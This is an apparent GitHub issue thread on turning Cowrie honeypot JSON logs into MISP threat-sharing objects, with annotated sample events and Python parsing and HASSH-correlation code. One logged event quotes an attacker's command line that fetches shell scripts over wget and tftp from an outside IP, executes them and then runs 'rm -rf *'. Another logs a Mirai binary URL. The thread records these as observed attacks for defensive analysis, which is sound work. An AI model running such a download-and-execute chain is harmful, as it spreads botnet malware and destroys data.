
Comments (7)

bontchev commented on August 17, 2024

As I mentioned on Twitter, I don't have experience with MISP (I just want to use it to share the data collected by our honeypot), so apologies if I say something stupid. I do, however, have significant experience with Cowrie - have been running it for more than a year and have made some minor improvements to it. Here are some additional remarks to what I posted on Twitter.

  • session isn't the only key that is present in every JSON entry in the log. The other such keys are eventid, timestamp and sensor.

  • The "important" key in the log entry is the eventid. It determines what other keys will be present in the entry.

Here are some examples of the different kinds of events that I have found in my logs, with the keys that are present in each one of them. The comments are mine:

{
	"eventid": "cowrie.client.fingerprint",
	"username": "root",	// username of the logged in attacker, not important (available from elsewhere)
	"timestamp": "2017-02-12T14:20:04.834341Z",
	"message": "public key attempt for user root with fingerprint 7c:ef:3c:b6:f0:7d:c4:a6:0d:7f:92:80:47:e4:83:89",	// message of the SSH connector, not important
	"fingerprint": "7c:ef:3c:b6:f0:7d:c4:a6:0d:7f:92:80:47:e4:83:89",	// fingerprint of the SSH connector
	"system": "SSHService 'ssh-userauth' on HoneyPotSSHTransport,68,185.110.132.202",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "185.110.132.202",	// IP address of the attacker
	"session": "8b1707a6",
	"sensor": "vesselin-pc"
} 

{
	"eventid": "cowrie.client.size",
	"timestamp": "2017-01-23T16:20:13.983063Z",
	"message": "Terminal Size: 24 280",	// Message produced by the SSH connector, not important
	"system": "SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,49,109.236.86.63",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"height": 280,	// height of the terminal session, not important
	"src_ip": "109.236.86.63",	// IP address of the attacker
	"width": 24,	// width of the terminal session, not important
	"isError": 0,	// whether an error occurred, not important
	"session": "182c9773",
	"sensor": "vesselin-pc"
} 

{
	"eventid": "cowrie.client.version",
	"macCS": ["hmac-sha1", "hmac-md5", "hmac-sha2-256"],	// HMAC algorithms supported by the attacker, not important
	"timestamp": "2017-01-23T09:54:10.873561Z",
	"session": "b309521c",
	"kexAlgs": ["diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1", "diffie-hellman-group-exchange-sha1", "diffie-hellman-group-exchange-sha256"],	// key exchange algorithms supported by the attacker, not important
	"keyAlgs": ["ssh-rsa", "ssh-dss"],	// public key algorithms supported by the attacker, not important
	"message": "Remote SSH version: SSH-2.0-ssh2js0.3.6",	// Message produced by the SSH connector, not important
	"system": "HoneyPotSSHTransport,1,91.224.161.88",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "91.224.161.88",	// IP address of the attacker
	"version": "SSH-2.0-ssh2js0.3.6",	// SSH client of the attacker
	"compCS": ["none"],	// no idea what this is, not important
	"sensor": "vesselin-pc",
	"encCS": ["3des-cbc", "aes256-ctr", "aes256-cbc", "aes192-ctr", "aes192-cbc", "aes128-cbc", "blowfish-cbc", "aes128-ctr", "cast128-cbc"]	// encryption algorithms supported by the attacker, not important
} 

{
	"eventid": "cowrie.command.failed",
	"timestamp": "2017-01-22T07:25:37.252756Z",
	"message": "Command not found: system",	// message of the Telnet connector, not important
	"system": "CowrieTelnetTransport,0,118.179.176.136",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "118.179.176.136",	// IP address of the attacker
	"session": "e7e8bc30",
	"input": "system",	// command entered by the attacker (not supported by the emulated system, so it failed)
	"sensor": "vesselin-pc"
} 

{
	"eventid": "cowrie.command.input",
	"timestamp": "2017-01-22T07:25:36.762093Z",
	"message": "CMD: enable",	// message of the Telnet connector, not important
	"system": "CowrieTelnetTransport,0,118.179.176.136",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "118.179.176.136",	// IP address of the attacker
	"session": "e7e8bc30",
	"input": "enable",	// command entered by the attacker
	"sensor": "vesselin-pc"
} 

{
	"eventid": "cowrie.command.success",
	"timestamp": "2017-01-22T07:25:36.763907Z",
	"message": "Command found: enable ",	// message of the Telnet connector, not important
	"system": "CowrieTelnetTransport,0,118.179.176.136",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "118.179.176.136",	// IP address of the attacker
	"session": "e7e8bc30",
	"input": "enable ",	// command entered by the attacker (supported by the emulated system, so it succeeded)
	"sensor": "vesselin-pc"
} 

{
	"eventid": "cowrie.direct-tcpip.data",
	"timestamp": "2017-01-23T14:18:48.114297Z",
	"sensor": "vesselin-pc",
	"system": "SSHChannel None (8) on SSHService 'ssh-connection' on HoneyPotSSHTransport,21,5.45.68.142",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "5.45.68.142",	// IP address of the attacker
	"session": "c9236624",
	"dst_port": 25,	// port to which the attacker is connecting
	"dst_ip": "173.194.222.27",	// IP to which the attacker is connecting
	"data": "'QUIT\\r\\n'",	// data sent by the attacker
	"message": "direct-tcp forward to 173.194.222.27:25 with data 'QUIT\\r\\n'"	// Message produced by the SSH connector, not important
} 

{
	"eventid": "cowrie.direct-tcpip.request",
	"timestamp": "2017-01-23T13:05:35.002275Z",
	"session": "6bf10bd8",
	"src_port": 22,	// port from which the attacker is connecting
	"message": "direct-tcp connection request to 94.137.63.251:443 from 127.0.0.1:22",	// Message produced by the SSH connector, not important
	"system": "SSHService 'ssh-connection' on HoneyPotSSHTransport,20,5.45.66.6",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "5.45.66.6",	// IP address of the attacker
	"dst_port": 443,	// port to which the attacker is connecting
	"dst_ip": "94.137.63.251",	// IP to which the attacker is connecting
	"sensor": "vesselin-pc"
} 

{
	"eventid": "cowrie.log.closed",
	"timestamp": "2017-01-23T07:27:06.632719Z",
	"message": "Closing TTY Log: log/tty/20170123-092633-None-0i.log after 32 seconds",	// message of the Telnet connector, not important
	"ttylog": "log/tty/20170123-092633-None-0i.log",	// name of the local input log file, not important
	"system": "CowrieTelnetTransport,0,46.166.142.56",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"src_ip": "46.166.142.56",	// IP address of the attacker
	"session": "c396b595",
	"duration": 32.80147910118103,	// session duration
	"sensor": "vesselin-pc",
	"isError": 0,	// whether an error occurred, not important
	"size": 12984	// size of the input log file, not important
} 

{
	"eventid": "cowrie.log.open",
	"timestamp": "2017-01-23T07:26:33.865075Z",
	"message": "Opening TTY Log: log/tty/20170123-092633-None-0i.log",	// message of the Telnet connector, not important
	"ttylog": "log/tty/20170123-092633-None-0i.log",	// name of the input log file
	"system": "CowrieTelnetTransport,0,46.166.142.56",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "46.166.142.56",	// IP address of the attacker
	"session": "c396b595",
	"sensor": "vesselin-pc"
} 

{
	"eventid": "cowrie.login.failed",
	"username": "admin",	// username used during an unsuccessful login attempt
	"timestamp": "2017-01-23T07:40:26.409071Z",
	"message": "login attempt [admin/4321] failed",	// message of the Telnet connector, not important
	"system": "CowrieTelnetTransport,19,42.117.30.27",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "42.117.30.27",	// IP address of the attacker
	"session": "f6bf51aa",
	"password": "4321",	// password used during an unsuccessful login attempt
	"sensor": "vesselin-pc"
} 

{
	"eventid": "cowrie.login.success",
	"username": "root",	// username used during a successful login attempt
	"timestamp": "2017-01-23T07:26:33.333922Z",
	"message": "login attempt [root/666666] succeeded",	// message of the Telnet connector, not important
	"system": "CowrieTelnetTransport,0,46.166.142.56",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "46.166.142.56",	// IP address of the attacker
	"session": "c396b595",
	"password": "666666",	// password used during a successful login attempt
	"sensor": "vesselin-pc"
} 

{
	"eventid": "cowrie.session.closed",
	"timestamp": "2017-01-23T07:27:06.639586Z",
	"message": "Connection lost after 37 seconds",	// message of the Telnet connector, not important
	"system": "CowrieTelnetTransport,0,46.166.142.56",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "46.166.142.56",	// IP address of the attacker
	"duration": 37.55857801437378,	// session duration
	"session": "c396b595",
	"sensor": "vesselin-pc"
} 

{
	"eventid": "cowrie.session.connect",
	"timestamp": "2017-01-23T07:26:29.081081Z",
	"session": "c396b595",
	"message": "New connection: 46.166.142.56:58692 (192.168.0.102:23) [session: TT0]",	// message of the Telnet connector, not important
	"src_port": 58692,	// source port of the attacker
	"system": "cowrie.telnet.transport.HoneyPotTelnetFactory",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "46.166.142.56",	// IP address of the attacker
	"dst_port": 23,	// destination port of the attacker
	"dst_ip": "192.168.0.102",	// destination IP of the attacker, not important
	"sensor": "vesselin-pc"
} 

{
	"eventid": "cowrie.session.file_download",
	"src_ip": "109.236.92.150",	// IP address of the attacker
	"session": "3d1ddc4f",
	"shasum": "f64c356e125fb3e773dfb2063ace00f5906c217c462f8f3f85edbbb63af9add6",	// SHA-256 of the uploaded file
	"url": "http://109.201.134.120:80/bins/mirai.x86",	// URL of the uploaded file
	"timestamp": "2017-01-23T12:30:58.682695Z",
	"outfile": "dl/f64c356e125fb3e773dfb2063ace00f5906c217c462f8f3f85edbbb63af9add6",	// local file name of the uploaded file, not important
	"sensor": "vesselin-pc",
	"message": "Downloaded URL (http://109.201.134.120:80/bins/mirai.x86) with SHA-256 f64c356e125fb3e773dfb2063ace00f5906c217c462f8f3f85edbbb63af9add6 to dl/f64c356e125fb3e773dfb2063ace00f5906c217c462f8f3f85edbbb63af9add6"	// message of the Telnet connector, not important
}

{
	"eventid": "cowrie.session.file_upload",
	"shasum": "891b01d92d0366fbb4af44135cfb9b4b9f9d2b28cc052f70cb9724ef30545608",	// SHA-256 of the uploaded file
	"timestamp": "2017-05-11T15:37:19.162358Z",
	"message": "SFTP Uploaded file \"fuck\" to dl/891b01d92d0366fbb4af44135cfb9b4b9f9d2b28cc052f70cb9724ef30545608",	// Message produced by the SSH connector, not important
	"system": "SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,27242,220.94.216.160",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"filename": "fuck",	// Name of the uploaded file
	"src_ip": "220.94.216.160",	// IP address of the attacker
	"outfile": "dl/891b01d92d0366fbb4af44135cfb9b4b9f9d2b28cc052f70cb9724ef30545608",	// local file name of the uploaded file, not important
	"session": "c3fef1c9",
	"sensor": "vess-box",
	"isError": 0	// whether an error occurred, not important
} 

{
	"eventid": "cowrie.session.input",
	"realm": "cat",	// not sure what this is, not important
	"input": "cd /tmp || cd /var/system || cd /mnt || cd /lib || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.158.115.201/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.158.115.201 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.158.115.201; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *.sh; rm -rf *",	// the command line as entered by the attacker
	"timestamp": "2017-04-02T10:32:17.353036Z",
	"message": "INPUT (cat): cd /tmp || cd /var/system || cd /mnt || cd /lib || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.158.115.201/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.158.115.201 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.158.115.201; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *.sh; rm -rf *",	// message of the Telnet connector, not important
	"system": "CowrieTelnetTransport,6683,181.20.74.193",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "181.20.74.193",	// IP address of the attacker
	"session": "7307ec97",
	"sensor": "vess-box"
} 

{
	"eventid": "cowrie.client.var",
	"name": "LANG",	// Variable name
	"value": "en_GB.UTF-8",	// Variable value
	"timestamp": "2018-02-04T08:17:44.128571Z",
	"message": "request_env: LANG=en_GB.UTF-8",	// Message produced by the SSH connector, not important
	"system": "SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,3613,118.33.75.186",	// name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
	"isError": 0,	// whether an error occurred, not important
	"src_ip": "118.33.75.186",	// IP address of the attacker
	"session": "8464c7a4f50f",
	"sensor": "yoda"
}

from misp-objects.
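An added example (my own code, not Cowrie's or misp-objects'): a small Python normaliser that applies the key layout described in the comment above. It checks the keys every entry carries, keeps only the keys that matter for a given eventid, uses the system key to tell Telnet from SSH, and folds events into one record per session. The attribute names, the sample lines and the IPs are constructed for this example, not taken from the MISP object template or real logs.

```python
import json
# Keys every Cowrie log entry carries (as noted in the comment above).
COMMON_KEYS = ("eventid", "timestamp", "session", "sensor")
# eventid -> (cowrie key, attribute name) pairs worth keeping. Attribute names
# are this example's own choice, not the MISP object template's.
EXTRACT = {
    "cowrie.session.connect": [("src_port", "src-port"), ("dst_port", "dst-port")],
    "cowrie.client.fingerprint": [("fingerprint", "ssh-key-fingerprint")],
    "cowrie.login.failed": [("username", "username"), ("password", "password")],
    "cowrie.login.success": [("username", "username"), ("password", "password")],
    "cowrie.command.input": [("input", "command")],
    "cowrie.session.input": [("input", "command")],
    "cowrie.session.file_download": [("url", "url"), ("shasum", "sha256")],
}

def normalise(line):
    """One JSON log line -> flat attribute dict, or None if malformed or ignored."""
    try:
        ev = json.loads(line)
    except ValueError:
        return None
    if not all(k in ev for k in COMMON_KEYS) or ev["eventid"] not in EXTRACT:
        return None
    out = {k: ev[k] for k in COMMON_KEYS}
    if "src_ip" in ev:
        out["src-ip"] = ev["src_ip"]
    for key, name in EXTRACT[ev["eventid"]]:
        if key in ev:
            out[name] = ev[key]
    # The "system" key tells Telnet and SSH sessions apart.
    sysname = ev.get("system", "").lower()
    out["protocol"] = "telnet" if "telnet" in sysname else ("ssh" if "ssh" in sysname else "unknown")
    return out

def build_sessions(lines):
    """Fold events into one record per session id (what a honeypot object in MISP would describe)."""
    sessions = {}
    for ev in filter(None, map(normalise, lines)):
        rec = sessions.setdefault(ev["session"], {"sensor": ev["sensor"], "protocol": "unknown"})
        for name, value in ev.items():
            if name in COMMON_KEYS or (name == "protocol" and value == "unknown"):
                continue
            if name in ("command", "username", "password", "url", "sha256"):  # may recur per session
                rec.setdefault(name, []).append(value)
            else:
                rec[name] = value
    return sessions
# Constructed sample lines in the layout shown above (not real log data).
SAMPLE = [
    '{"eventid":"cowrie.session.connect","timestamp":"t1","session":"c396b595","sensor":"vesselin-pc","src_ip":"192.0.2.10","src_port":58692,"dst_port":23,"system":"cowrie.telnet.transport.HoneyPotTelnetFactory"}',
    '{"eventid":"cowrie.login.success","timestamp":"t2","session":"c396b595","sensor":"vesselin-pc","src_ip":"192.0.2.10","username":"root","password":"666666","system":"CowrieTelnetTransport,0,192.0.2.10"}',
    '{"eventid":"cowrie.command.input","timestamp":"t3","session":"c396b595","sensor":"vesselin-pc","src_ip":"192.0.2.10","input":"enable","system":"CowrieTelnetTransport,0,192.0.2.10"}',
    'not json at all',
]
```

Events whose eventid is not in EXTRACT (for instance cowrie.client.size) and lines that are not JSON are dropped rather than raising, so a consumer tailing the log keeps running.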

adulau commented on August 17, 2024

Good point. Looking at the source code, cowrie now supports the HASSH from Salesforce. I updated the MISP object of cowrie to match the hassh type that we have in MISP. I didn't disable the correlation until now as I'm wondering about the number of FPs from correlation on HASSH.

@gallypette maybe we should check this on the Passive SSL side too.

Ref: https://github.com/cowrie/cowrie/blame/cc7d65adc0c9e1be1dcbb670c26ffa34e5238f95/src/cowrie/ssh/transport.py#L168

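As an added illustration of the HASSH correlation question (example code, not from Cowrie or misp-objects): the client HASSH is MD5 over the kex, encryption, MAC and compression lists that a cowrie.client.version event already carries, and grouping sessions by that hash shows how many distinct sources share one client fingerprint, which is what decides whether automatic correlation is useful or noisy. The IPs, the noisy_at threshold and the helper names are this example's assumptions; the algorithm lists are copied from the cowrie.client.version sample above.

```python
import hashlib
from collections import defaultdict

def hassh_from_event(ev):
    """Client HASSH for a cowrie.client.version event: the four algorithm lists
    comma-joined, joined with ';' in the order kex;enc;mac;comp, then MD5
    (the published HASSH recipe). Keys are those in the samples above."""
    parts = (ev["kexAlgs"], ev["encCS"], ev["macCS"], ev["compCS"])
    algorithms = ";".join(",".join(p) for p in parts)
    return hashlib.md5(algorithms.encode("utf-8")).hexdigest()

def hassh_correlation(events, noisy_at=3):
    """Group source IPs and version banners by HASSH. A hash seen from at least
    `noisy_at` distinct IPs (threshold is this example's assumption) is flagged
    as one an automatic correlation would fire on constantly."""
    groups = defaultdict(lambda: {"src_ips": set(), "versions": set()})
    for ev in events:
        if ev.get("eventid") != "cowrie.client.version":
            continue
        g = groups[hassh_from_event(ev)]
        g["src_ips"].add(ev["src_ip"])
        g["versions"].add(ev["version"])
    return {h: {"src_ips": sorted(g["src_ips"]), "versions": sorted(g["versions"]),
                "noisy": len(g["src_ips"]) >= noisy_at}
            for h, g in groups.items()}

# Algorithm lists copied from the cowrie.client.version sample above; IPs are
# constructed (RFC 5737 documentation ranges), not observations.
COMMON_LISTS = {
    "kexAlgs": ["diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1",
                "diffie-hellman-group-exchange-sha1", "diffie-hellman-group-exchange-sha256"],
    "keyAlgs": ["ssh-rsa", "ssh-dss"],  # host key algorithms are not part of HASSH
    "encCS": ["3des-cbc", "aes256-ctr", "aes256-cbc", "aes192-ctr", "aes192-cbc",
              "aes128-cbc", "blowfish-cbc", "aes128-ctr", "cast128-cbc"],
    "macCS": ["hmac-sha1", "hmac-md5", "hmac-sha2-256"],
    "compCS": ["none"],
}

def version_event(src_ip, version, **overrides):
    """Build a constructed cowrie.client.version event around the common lists."""
    ev = dict(COMMON_LISTS, eventid="cowrie.client.version", src_ip=src_ip,
              version=version, session="0000", sensor="example-sensor")
    ev.update(overrides)
    return ev

SAMPLE_EVENTS = [
    version_event("192.0.2.1", "SSH-2.0-ssh2js0.3.6"),
    version_event("192.0.2.2", "SSH-2.0-ssh2js0.3.6"),
    version_event("198.51.100.7", "SSH-2.0-ssh2js0.4.0"),  # same lists, newer banner
    version_event("203.0.113.9", "SSH-2.0-ssh2js0.3.6", macCS=["hmac-sha2-256"]),  # different MAC list
    {"eventid": "cowrie.client.size", "src_ip": "192.0.2.1", "width": 24, "height": 280},
]
```

Note that the banner string is not part of the hash: two different ssh2js versions with the same algorithm lists collapse into one HASSH, while a changed MAC list splits an otherwise identical client into a separate group.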

adulau commented on August 17, 2024

Object updated to add SSH sessions a93a285

More tests will follow tomorrow to add files and sighting. PR to Cowrie should follow soon.


adulau commented on August 17, 2024

  • Redis input in Cowrie (avoid blocking or slowing down honeypot sessions) and allowing generic JSON input - PR merged.
  • Generic wrapper to easily add object or attributes from honeypots like Cowrie or Kippo.
  • Consumer for Redis input (from Cowrie and other honeypots) to update a daily event in a MISP. First version.
  • Create a specific Cowrie object template.
  • Import Cowrie object from the Consumer Redis CowrieMISPObject.
  • Allow weekly event in addition to daily event.
  • A new blog post on misp-project.org to explain how to integrate MISP with honeypots and how to generate daily/weekly event and share it with the communities.


jaydesai-lintel commented on August 17, 2024

@bontchev
Hi Bontchev,
I want to use the same log details in our application. I have not found any way to capture all the log event details like you mentioned above. Could you please help me?

I need to capture all the details, as shown below, for all events:
{
"eventid": "cowrie.client.fingerprint",
"username": "root", // username of the logged in attacker, not important (available from elsewhere)
"timestamp": "2017-02-12T14:20:04.834341Z",
"message": "public key attempt for user root with fingerprint 7c:ef:3c:b6:f0:7d:c4:a6:0d:7f:92:80:47:e4:83:89", // message of the SSH connector, not important
"fingerprint": "7c:ef:3c:b6:f0:7d:c4:a6:0d:7f:92:80:47:e4:83:89", // fingerprint of the SSH connector
"system": "SSHService 'ssh-userauth' on HoneyPotSSHTransport,68,185.110.132.202", // name of the honeypot subsystem, can be used to distinguish Telnet and SSH sessions
"isError": 0, // whether an error occurred, not important
"src_ip": "185.110.132.202", // IP address of the attacker
"session": "8b1707a6",
"sensor": "vesselin-pc"
}


bontchev commented on August 17, 2024

It is possible that now the SSH fingerprint is recorded in a cowrie.client.kex event, see this:

https://github.com/cowrie/cowrie/blob/cc7d65adc0c9e1be1dcbb670c26ffa34e5238f95/src/cowrie/ssh/transport.py


adulau commented on August 17, 2024

Cowrie object template is quite complete nowadays.
